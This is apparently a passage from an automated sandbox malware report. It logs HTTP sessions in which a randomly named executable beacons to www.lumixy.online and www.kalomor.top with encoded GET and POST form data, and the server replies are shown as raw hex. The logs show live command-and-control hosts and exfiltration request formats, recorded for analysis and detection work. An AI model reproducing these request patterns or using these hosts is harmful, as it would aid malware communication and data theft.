              Sep 6, 2024 09:06:40.600162029 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
              Sep 6, 2024 09:06:40.600177050 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
              Sep 6, 2024 09:06:40.600263119 CEST448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
              Sep 6, 2024 09:06:40.600281954 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
              Sep 6, 2024 09:06:40.605159044 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.649752184.94.212.115805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:42.567337036 CEST531OUTGET /so9n/?FR=kfwT0b19IOKcOFwPtUe9Dwhdq1KCUnZZUdvJW1zli8UTkV27q7a5c8UKgIiCSTwlp8ToQZ+GSYiqoCrUiDCARooQABC7bvQsg0wobGai6LL68ECzCx14NnY8N25SgLExp3s5W9s=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.lumixy.online
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:43.148684025 CEST1236INHTTP/1.1 404 Not Found
              Date: Fri, 06 Sep 2024 07:06:43 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 6, 2024 09:06:43.148705006 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
              Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
              Sep 6, 2024 09:06:43.148716927 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
              Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
              Sep 6, 2024 09:06:43.148777962 CEST1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
              Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
              Sep 6, 2024 09:06:43.148789883 CEST1236INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
              Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
              Sep 6, 2024 09:06:43.148806095 CEST1236INData Raw: 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73
              Data Ascii: 1,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533"
              Sep 6, 2024 09:06:43.148818970 CEST1236INData Raw: 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20
              Data Ascii: -width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43
              Sep 6, 2024 09:06:43.148951054 CEST108INData Raw: 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30
              Data Ascii: 4672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,
              Sep 6, 2024 09:06:43.148963928 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
              Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
              Sep 6, 2024 09:06:43.148972988 CEST224INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
              Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4
              Sep 6, 2024 09:06:43.153892994 CEST1236INData Raw: 2e 36 37 31 35 37 31 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31
              Data Ascii: .6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.0015747


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.64975491.215.85.23805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:48.561974049 CEST788OUTPOST /pf98/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.kalomor.top
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.kalomor.top
              Referer: http://www.kalomor.top/pf98/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 36 68 70 6a 66 6a 75 7a 4e 35 32 54 55 69 52 79 46 66 68 47 43 58 70 42 4a 31 57 68 59 55 64 78 6a 61 72 33 47 79 7a 55 4c 2f 70 64 47 6a 61 74 78 50 4b 61 44 6f 4d 2b 51 4e 77 41 34 72 51 68 69 4b 2b 6a 51 43 39 72 79 59 30 30 52 68 35 69 50 55 63 6a 48 2f 49 74 6c 5a 56 62 59 6a 67 62 30 78 54 34 53 59 4f 42 79 63 35 7a 4c 44 58 5a 4f 73 68 72 67 4f 39 2b 48 4f 34 6d 32 79 71 79 65 32 6f 57 6c 31 67 30 43 4c 48 6c 76 6f 6b 33 5a 34 72 79 33 71 62 49 56 54 70 35 79 35 64 77 33 33 42 65 33 51 42 77 70 42 71 7a 35 47 31 76 7a 68 57 57 49 72 4a 75 73 66 47 32 6c 35 37 35 75 7a 50 4d 57 47 76 36 7a 4e 35 36
              Data Ascii: FR=6hpjfjuzN52TUiRyFfhGCXpBJ1WhYUdxjar3GyzUL/pdGjatxPKaDoM+QNwA4rQhiK+jQC9ryY00Rh5iPUcjH/ItlZVbYjgb0xT4SYOByc5zLDXZOshrgO9+HO4m2yqye2oWl1g0CLHlvok3Z4ry3qbIVTp5y5dw33Be3QBwpBqz5G1vzhWWIrJusfG2l575uzPMWGv6zN56
              Sep 6, 2024 09:06:49.258800030 CEST711INHTTP/1.1 405 Not Allowed
              Server: nginx/1.26.2
              Date: Fri, 06 Sep 2024 07:06:49 GMT
              Content-Type: text/html
              Content-Length: 559
              Connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.64975591.215.85.23805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:51.107414007 CEST812OUTPOST /pf98/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.kalomor.top
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.kalomor.top
              Referer: http://www.kalomor.top/pf98/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 36 68 70 6a 66 6a 75 7a 4e 35 32 54 47 53 4e 79 47 2f 64 47 44 33 70 43 46 56 57 68 57 30 64 31 6a 61 33 33 47 7a 48 45 65 64 39 64 47 47 6d 74 77 4c 6d 61 41 6f 4d 2b 66 74 77 42 38 72 52 74 69 4b 43 46 51 48 46 72 79 62 49 30 52 6b 39 69 49 6a 6f 73 47 76 49 76 77 4a 56 5a 41 44 67 62 30 78 54 34 53 59 79 37 79 63 68 7a 4c 7a 6e 5a 4d 4e 68 6b 71 75 39 2f 50 75 34 6d 37 53 71 32 65 32 6f 30 6c 78 68 52 43 49 7a 6c 76 71 4d 33 61 74 48 78 67 61 62 43 4b 44 6f 59 69 63 41 53 74 56 41 74 30 6a 42 58 77 78 32 49 78 51 30 31 76 53 57 31 61 37 70 73 73 64 65 45 6c 5a 37 54 73 7a 33 4d 45 52 6a 64 38 35 63 5a 39 4c 68 32 58 32 57 32 64 72 37 4a 2b 38 53 4f 4c 44 47 61 2b 67 3d 3d
              Data Ascii: FR=6hpjfjuzN52TGSNyG/dGD3pCFVWhW0d1ja33GzHEed9dGGmtwLmaAoM+ftwB8rRtiKCFQHFrybI0Rk9iIjosGvIvwJVZADgb0xT4SYy7ychzLznZMNhkqu9/Pu4m7Sq2e2o0lxhRCIzlvqM3atHxgabCKDoYicAStVAt0jBXwx2IxQ01vSW1a7pssdeElZ7Tsz3MERjd85cZ9Lh2X2W2dr7J+8SOLDGa+g==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.64975691.215.85.23805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:53.652947903 CEST1825OUTPOST /pf98/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.kalomor.top
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.kalomor.top
              Referer: http://www.kalomor.top/pf98/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 36 68 70 6a 66 6a 75 7a 4e 35 32 54 47 53 4e 79 47 2f 64 47 44 33 70 43 46 56 57 68 57 30 64 31 6a 61 33 33 47 7a 48 45 65 64 6c 64 48 30 65 74 78 73 79 61 42 6f 4d 2b 42 39 77 36 38 72 51 33 69 4b 61 42 51 47 34 57 79 64 4d 30 51 43 42 69 4a 58 30 73 49 76 49 76 76 35 56 55 59 6a 67 4f 30 78 6a 38 53 59 43 37 79 63 68 7a 4c 77 76 5a 46 38 68 6b 6c 4f 39 2b 48 4f 34 36 32 79 72 52 65 32 67 4f 6c 78 6c 76 43 2b 44 6c 71 36 38 33 4a 76 66 78 69 36 62 45 4c 44 6f 36 69 63 45 6b 74 56 64 65 30 67 64 70 77 77 4f 49 67 55 35 78 32 68 54 75 4a 4e 41 49 74 4e 71 46 6a 75 54 50 69 52 2f 70 55 51 53 76 69 4b 78 32 2f 4d 5a 4a 64 58 72 6e 61 4a 4c 69 39 4c 66 41 44 52 62 4c 72 79 33 6d 72 74 79 53 4c 43 38 2f 4d 4d 2f 4b 37 37 49 48 49 6a 57 50 59 38 74 45 6f 57 51 6a 52 41 58 6e 52 46 2f 78 73 59 67 36 4d 6f 53 58 53 71 49 47 6e 43 38 47 42 7a 38 4a 41 49 35 6a 4b 67 69 6b 50 78 33 2f 44 79 53 50 44 43 69 6d 6e 76 33 78 59 31 6e 45 50 6a 31 50 72 68 6c 61 41 74 32 7a 4c 64 44 78 41 38 72 6b 79 5a 75 [TRUNCATED]
              Data Ascii: FR=6hpjfjuzN52TGSNyG/dGD3pCFVWhW0d1ja33GzHEedldH0etxsyaBoM+B9w68rQ3iKaBQG4WydM0QCBiJX0sIvIvv5VUYjgO0xj8SYC7ychzLwvZF8hklO9+HO462yrRe2gOlxlvC+Dlq683Jvfxi6bELDo6icEktVde0gdpwwOIgU5x2hTuJNAItNqFjuTPiR/pUQSviKx2/MZJdXrnaJLi9LfADRbLry3mrtySLC8/MM/K77IHIjWPY8tEoWQjRAXnRF/xsYg6MoSXSqIGnC8GBz8JAI5jKgikPx3/DySPDCimnv3xY1nEPj1PrhlaAt2zLdDxA8rkyZu5griCOyn2DjtaoQSb3b8EP06QOZdJvo92dO1ErU0PPntqYiSkGHVqLNWhDoxJM0M25pBdWSpxogPQw/3mYYxwy5QEuZzCZimB6ZPl0q95hxAERUtRaWwkqIPA71thw3kbpa1sEpyyDtJjGhPF5AbpQ+CfPgFXfGOwxYSDXd1NZ924ltxiED4+0jetaPbROJOA8maW/1ZjDq1olcW4FjNkoy9ufIA7b/4izpuLo/w56ZS/00MZ/f6c28xjLuSKck6rtBBmfnQoQVR7laGlPCpIqiOYaG0LE2xSn2izrk4pAKne99JrMvFg7mmqroxjbEDl+UojDmZdxdYWP4E0oJnRGukWoZzEDJTtIdQNf7624AYhMoymgz5oTld8x+yRdi+mPJCkoVl21Wt3+6xHqx79/c0tHXtj7TOq7VHlRrfX4lYhrIVefZWMOPo0sMgMg/NupdijJRTPieOcyY5W/hia3idWzyMLFgAnNioCdJPTk5zPJicNY1tSEkzxhFO15IsngYmcVD/buRIWelxn2DWoSrznXEmHcQQDmyfr8V6c2mE7KgIx1w/YK6GYBjII69vZzqxbiDCRkgDvdAamSLcjmweO9L4DFdJxvqP/e0ooek7Ha8r6M+pXVWfy6z58ylvWLiTfcTOxCi5Y0IY/StG6Dx3SBhE7V66Od [TRUNCATED]
              Sep 6, 2024 09:06:54.344257116 CEST711INHTTP/1.1 405 Not Allowed
              Server: nginx/1.26.2
              Date: Fri, 06 Sep 2024 07:06:54 GMT
              Content-Type: text/html
              Content-Length: 559
              Connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.64975791.215.85.23805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:06:56.192811012 CEST529OUTGET /pf98/?FR=3jBDcWbmLrShHmxnPMFZKghCFWWefh1Z2LPMDwvUTpx/DkKazbfgKbcBR8lW4oJr2d6xPk4dsMQJMRxiEW07CNh+pZ1lAg0Z7H/dVeHhjsdFGVPZJstcy8xxVNZ/uGWZUGk7w1E=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.kalomor.top
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:06:56.875104904 CEST1236INHTTP/1.1 200 OK
              Server: nginx/1.26.2
              Date: Fri, 06 Sep 2024 07:06:56 GMT
              Content-Type: text/html
              Content-Length: 15793
              Last-Modified: Thu, 15 Aug 2024 13:57:27 GMT
              Connection: close
              ETag: "66be0947-3db1"
              Accept-Ranges: bytes
